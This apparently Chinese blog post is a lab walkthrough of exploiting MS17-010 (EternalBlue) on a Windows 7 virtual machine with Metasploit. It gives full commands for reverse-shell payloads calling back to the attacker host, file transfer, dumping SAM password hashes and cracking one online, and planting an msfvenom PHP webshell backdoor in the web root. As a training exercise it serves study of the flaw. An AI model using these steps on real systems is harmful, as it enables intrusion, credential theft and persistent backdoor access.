MS17-010漏洞利用

Zovt發表於2021-11-22

MS17-010漏洞利用

1.安裝虛擬機器win7 x64,實現利用ms17-010實現對其win7 x64主機開始滲透,檢視該主機資訊,開啟遠端桌面,抓取使用者名稱和密碼並破譯,建立一個 : 70zsz.txt檔案,實現上傳,下載,刪除。

首先啟動win7 x64虛擬機器,檢視IP地址為192.168.70.139,如下如圖所示:

在win7 x64上搭建wamp網站伺服器從上到下依次安裝軟體,如下如所示:

安裝成功後通過瀏覽器訪問192.168.70.139檢視是否能正常訪問該網站,如下圖所示:

Ms17-010漏洞的利用

接下來開啟kali實現利用ms17-010漏洞,實現對其win7 x64主機進行滲透,首先使用scanner下掃描模組掃描目標主機是否存在ms17-010的漏洞,如下圖所示:
在kali中輸入以下命令:

命令:msfconsole

命令:search ms17-010

>use auxiliary/scanner/smb/smb_ms17-010
>set RHOSTS 192.168.70.139
>run

確認目標機器的作業系統及存在漏洞之後便可以進行漏洞攻擊了,輸入命令use exploit/windows/smb/ms17_010_eternalblue,呼叫exploit下的ms17_010_eternalblue模組,並輸入命令show payloads 檢視可用的payload,如下圖所示:

輸入命令set payload windows/x64/meterpreter/reverse_tcp設定payload,並輸入命令show options檢視引數配置,如下圖所示,需要配置的引數為RHOST和LHOST

輸入命令set RHOST 192.168.70.139 配置目標機器的IP地址,輸入命令set LHOST 192.168.70.134 配置kali本地的IP地址,配置完成後輸入命令show options檢查引數,如下圖所示:

引數配置檢查無誤後,輸入命令run開始攻擊,並且返回一個meterptrter會話說明已經攻擊成功了,如下圖所示:

後滲透攻擊:資訊收集

程式遷移:例如攻擊者利用瀏覽器漏洞攻陷了目標主機,但攻擊滲透後的瀏覽器有可能被使用者關閉,此shell是非常脆弱的,所以獲取shell後的第一步就是移動這個shell,將它和目標主機中一個穩定的程式繫結在一起。

例如:輸入ps命令獲取目標主機正在執行的程式,如下圖所示:

輸入命令getpid檢視meterperter shell的程式號為2280,如下圖所示:

我們可用使用自動遷移程式命令,系統會自動尋找合適的程式然後進行遷移,輸入自動遷移命令run post/windows/manage/migrate,執行命令後此時將原先的2280程式號修改為1244,如圖所示:

收集系統資訊:獲取了穩定程式之後開始收集系統資訊,輸入命令sysinfo檢視目標主機的系統資訊,如下圖所示:

捕獲桌面輸入命令screenshot抓取目標主機的螢幕截圖路徑為/root/bPgQxuoB,jpeg檔案,如下圖所示:

輸入shell命令進入目標機器shell,如下圖所示:

在shell輸入exit可用停止shell會話並返回meterperter中,如下圖所示:

上傳檔案命令upload,在kali虛擬機器root目錄下存在70zsz.txt檔案,其內容為I‘m is 70 zsz!,輸入命令upload /root/70zsz.txt c:\\,此檔案上傳到目標機器c:\目錄下,如下圖所示:

輸入shell進入Windows shell檢視從c:\目錄下是否有剛剛我們上傳的70zsz.txt檔案,如下圖所示:

下載檔案命令download,輸入命令download c:\70zsz.txt/root/download將目標機器c:\下的70zsz.txt下載到本機/root/download中,如下圖所示:

輸入命令rm c:\\70zsz.txt 將目標機器c:\下的70zsz.txt刪除,如下圖所示:

後滲透攻擊:Hash攻擊

使用Hashdump抓取密碼,HashdumpMeterpreter指令碼可用從目標機器中提取Hash值,破解Hash值可獲得登入密碼。計算機中的每個賬號的使用者名稱和密碼都儲存在sam中,當計算機執行時,該檔案對所有賬號進行鎖定,想要訪問就必須有“系統級“的賬號。

在meterpreter shell提示符下輸入hashdump命令,將匯出sam資料庫中Hash,如下圖所示:

從圖中我們可用看出,返回了三個使用者賬號,分別為Administrator,Guest,zsz,資料輸出的格式為使用者名稱:SID:LM雜湊:NTLM雜湊:::,在zsz賬戶中NTLM雜湊進行破解,使用線上破解網站對其進行破解,如https://www.cmd5.com/,可以看到結果正是為zsz賬戶的密碼:123456

後滲透攻擊:後門

Meterpreter後門:在Meterpreter中,有一個名為PGP Meterpreter的payload,利用這個模組可建立具有Meterpreter功能的PHP WebShell,在攻擊中使用Metasploit PHP Shell步驟如下:
1.使用msfvenom建立一個webshell.php

2.上傳webshell.php到目標伺服器

3.執行Metasploit multi-handler開始監聽

4.訪問webshell.php頁面

5.獲得反彈Metasploit shell

首先通過Metasploit的msfvenom攻擊製作PHP Meterpreter,輸入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php,如下圖所示:

因為目標主機使用了wampserver,因此得知需要上傳070zsz.php檔案至目標主機中c:\wamp64\www中,如下圖所示:

輸入exit返回meterpreter,使用上傳命令upload/root/070zsz.php c:\\wamp64\\www中,如下圖所示:

輸入exit回到msf,輸入如下命令設定監聽,如下圖所示:

>exit
>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set LHOST 192.168.70.134
>run

開啟瀏覽器,訪問目標機器伺服器中070zsz.php檔案,即訪問http://192.168.70.139/070zsz.php ,結果可以看到服務端反彈shell成功如下圖所示:

相關文章